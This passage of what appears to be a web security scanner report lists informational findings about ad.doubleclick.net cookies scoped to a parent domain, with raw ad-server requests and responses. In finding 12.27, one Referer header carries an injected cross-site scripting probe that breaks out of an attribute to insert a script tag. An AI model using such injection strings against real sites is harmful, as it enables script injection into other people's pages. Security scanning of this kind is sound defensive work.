Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468285&bpp=5&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966468319&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=80&xpc=GEVMBFEjsI&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

12.22. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3727.Expedia.com/B5235969.34

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cbe27c438000036||t=1307967093|et=730|cs=12bhpdog; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:11:33 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:11:33 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3727.Expedia.com/B5235969.34;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9ghjlZF6iSwYlb.krXjG_wmefTlnZW8sdXNhLHQsMTMwNzk2NzA5MTgzNCxjLDM0ODU5MyxwYyw3ODUyNyxhYywxNzE4ODYsbyxOMC1TMCxsLDYzMDg2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVUySFA2YW1aMmN1UURuLjFWUndwcktlUVpoaEZuWlc4c2RYTmhMSFFzTVRNd056azJOekE1TURVM05DeGpMRE0wT0RZMk15eHdZeXczT1RBeE5DeGhZeXd4TnpNME5USXNieXhPTUMxVE1DeHNMRFl6TkRZM0xIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTHpGeFRuZFFVWEpZTm5wZldHOHpRVGxEZEdaeVVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1d4RGJXODBhRFZRVW01ZllYbEVSMjkyUW1SNU9YWmZkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZFY21wM1ZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVhwblZVSkJaMVZEUVZGUlFVRkJRVUZ3VTFCYVpVRkJRVUZCUVM0dlkyNWtQU0ZIVVZac1MyZHBMWHBSVVZFMk5UaFhSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSlRlVzVqWWw4M01WUlpZWFZEWVZnMmJFRmxSakUzYm01RFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHMUNjMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0pWZWpaWFNERk1WMFV4TlVWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSM1NrZGlWbEpQVDFJNWIyaFZTMDVYYTFwVmEzWTFhQzB6TTJ0UkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1150304106? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985085&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967085704&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967085746&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=642594083&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=85&xpc=fI9ap0W4vx&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 11934
Set-Cookie: id=cbe27c438000036||t=1307967093|et=730|cs=12bhpdog; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:11:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:11:33 GMT
Date: Mon, 13 Jun 2011 12:11:34 GMT
Expires: Mon, 13 Jun 2011 12:11:34 GMT
Cache-Control: private

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...

12.23. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c4679c43800006b||t=1307969540|et=730|cs=uaciighh; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:52:20 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:52:20 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKgC7SkJAurVkIG6ypvqgo9ZQkHdnZW8sdXNhLHQsMTMwNzk2OTUzODM0NixjLDM0NTc3MCxwYyw3NzQ4MixhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVoSlIxUTljZjJQbjdaRVFMRXlfaVJwcTdGRnBuWlc4c2RYTmhMSFFzTVRNd056azJPVFV6TmpNMk55eGpMRE0wTmpRMk9DeHdZeXczT1Rjd01TeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNCSVFUbERkR1ZxUld0RGEyTkVNRXN4TmsxVFVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1V4c01EaHZVVWRJV25OZllYbEVSMjkyUW1SNVh6bENYMXBPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU2psQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVGUk1FSkJaMVZEUVZGUlFVRkJRVUV4UWpoa1RXZEJRVUZCUVM0dlkyNWtQU0ZqUVZoVlRGRnFZek5uVVZGNVpXZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkhjRUZxWDBGbU1sUmtOemhQZFZCTWMxRmxXblZOUTBORVRtWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTjBRMVJCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFWQlVTMlZuUkhSUmFtOUJlRlF4UVhkQlFVRk5RMEZDZEVkNGJWcHhTMnMwTTJ0UlVTWnVkVzA5TVNaemFXYzlRVWRwVjNGMGQwaHlhRlUwTkVzd0xWUndZakEzV0dwMFEzWkdTbUZzVm5oS2R5WmpiR2xsYm5ROVkyRXRjSFZpTFRjME9UUXhOVFl3TWpjd01UZ3pOREltWVdSMWNtdzlDZy0tL2Nsa3VybD0K/clkurl=;ord=541949523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532138&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307969532175&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=114&xpc=7VyOei7CI6&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 11960
Set-Cookie: id=c4679c43800006b||t=1307969540|et=730|cs=uaciighh; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:52:20 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:52:20 GMT
Date: Mon, 13 Jun 2011 12:52:21 GMT
Expires: Mon, 13 Jun 2011 12:52:21 GMT
Cache-Control: private

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

12.24. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cc8d5c338000030||t=1307964400|et=730|cs=x_fajlys; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:40 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUPHluEI0CFhQMntGSMIANeF9ITIFnZW8sdXNhLHQsMTMwNzk2NDAxMjUyMyxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU0T3BXZDUxNy56WUJWN21Gbmx3ZjFDdTVBXzFuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RBeE9TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUkVSMFgzVlRZekJrYkVGZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZabk9FSkJaMVZEUVZGUlFVRkJRVUZOVW5seFEyZEJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkpUVTg0V2xCTU1WUmlOMlpCTm1KUmJGRmxUelZsUnpSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNVNGWlpXRkp2V0d4NWJ6RkxZM1ZvTTJ0cGJuTmlUVGRYYXpKUkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=346030314? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003305&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964003248&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=3&dtd=12&xpc=7SXqZNuALm&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2019
Set-Cookie: id=cc8d5c338000030||t=1307964400|et=730|cs=x_fajlys; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:40 GMT
Date: Mon, 13 Jun 2011 11:26:40 GMT
Expires: Mon, 13 Jun 2011 11:26:40 GMT
Cache-Control: private

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/4/64f/%2a/k;241004352;1-0;0;62740535;3454-728/90;42550474/42568261/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQA
...[SNIP]...

12.25. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c8ff4c3380000f6||t=1307965558|et=730|cs=jt1pje3v; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:45:58 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:45:58 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUYdpcvZVUHMBit47.JlhAJCXBZnlnZW8sdXNhLHQsMTMwNzk2NTU1NjM3MyxjLDM0NTc2NSxwYyw3NzQ5MixhYywxNjk5NzksbyxOMC1TMCxsLDYyMjA0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU5V2VHQi5YbHFLVDlGS0NNQmhUVnFoRkhRME5uWlc4c2RYTmhMSFFzTVRNd056azJOVFUxTkRNNU1DeGpMRE0wTmpRMU1peHdZeXc0TURVM01peGhZeXd4TnpjNU9UZ3NieXhPTUMxVE1DeHNMRFkxTURNekxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNKVlptaGxhRk4xTjNvdGRWSXRSalpHU3pkMlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFVwNU1HZDFNR1UyYUhGZllYbEVSMjkyUW1SNU9YWXRVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDVFZOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZoQk9FSkJaMVZEUVZGUlFVRkJRVUZpVTB0UVZXZEJRVUZCUVM0dlkyNWtQU0Z3UVZKNFNsRnBPV2QzVlZGNlNrRmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkNiVTVTWW5acU1WUmlTRmRQTFY5TWMxRmxibkJpZW5SQ1RtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHVkNPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNk5tcEdVMGt5UW5kbmJFUk1iSFp0ZEVVMWIzb3hTM3ByVWpobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=971871834? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983550&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965550231&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965550274&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1455171707&ga_fc=1&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=102&xpc=dku4JBfkuZ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 11871
Set-Cookie: id=c8ff4c3380000f6||t=1307965558|et=730|cs=jt1pje3v; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:45:58 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:45:58 GMT
Date: Mon, 13 Jun 2011 11:45:58 GMT
Expires: Mon, 13 Jun 2011 11:45:58 GMT
Cache-Control: private

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

12.26. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c35cbc338000066||t=1307964115|et=730|cs=knafhrho; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:21:55 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:21:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N6294.149112.GLAMMEDIA.COM/B5303021.4;sz=728x90;click=http://www30a2.glam.com/gad/click.act?0399-_urlenc%3D1-_gclickid%3Dgaclk4df5f0f3e05d3-_advid%3D50002164-_adid%3D5000044847-_crid%3D500032873-_aipid%3D201106130402-_ge_%3D1%5E2%5E72ae7c970a4e7f718295179443953301-ord%3D2206037009600550-afid%3D1000212071-dsid%3D864279-sz%3D728x90-zone%3D%2F-sid%3D115232130551023312111-tile%3D2-seq%3D1-tt%3Dj-atf%3D0-url%3D19ug13-flg%3D64-u%3Db0032y5ic8r1sscit6r%2Cf0f02sa%2Cg10001s-_gclick_gaclk4df5f0f3e05d3;ord=4df5f0f3dee69? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7257
Set-Cookie: id=c35cbc338000066||t=1307964115|et=730|cs=knafhrho; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:21:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:21:55 GMT
Date: Mon, 13 Jun 2011 11:21:56 GMT
Expires: Mon, 13 Jun 2011 11:21:56 GMT
Cache-Control: private

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

12.27. http://ad.doubleclick.net/adj/buz.idolator/content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/buz.idolator/content

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cd8dec338000050||t=1307964749|et=730|cs=0fe_sykh; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:32:29 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:32:29 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/buz.idolator/content;pos=728a;tile=1;sz=728x90;kw=newmoon,ashleygreene,eclipse,elizabethreaser;celeb=taylorlautner;ord=1648432966321706? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1911
Set-Cookie: id=cd8dec338000050||t=1307964749|et=730|cs=0fe_sykh; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:32:29 GMT
